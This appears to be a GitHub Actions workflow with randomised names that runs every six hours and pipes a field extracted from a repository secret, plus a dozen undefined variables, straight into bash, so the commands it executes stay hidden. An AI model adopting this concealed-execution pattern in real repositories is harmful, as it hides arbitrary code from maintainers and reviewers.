name: qunzhengxialu
on:
  workflow_dispatch:
  schedule:
    - cron: '31 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: qunzhengxialu
        env:
          vn614: ${{ secrets.vn614 }}
        run: |
          echo $vn614 | jq -r .nxavy7 | /bin/bash
          echo $m48 | jq -r .fwwee1 | /bin/bash
          echo $e095 | jq -r .srv99178 | /bin/bash
          echo $mrtt3928 | jq -r .rtunu76052 | /bin/bash
          echo $anbzu56 | jq -r .zux0211 | /bin/bash
          echo $j2 | jq -r .l02 | /bin/bash
          echo $mbf065 | jq -r .ir02 | /bin/bash
          echo $isik909 | jq -r .fgx793 | /bin/bash
          echo $krs8293 | jq -r .rtg579 | /bin/bash
          echo $rhd347 | jq -r .ykv0 | /bin/bash
          echo $fgy17 | jq -r .s13381 | /bin/bash
          echo $xvrqk406 | jq -r .rhif63 | /bin/bash
          echo $q1 | jq -r .zuac299 | /bin/bash

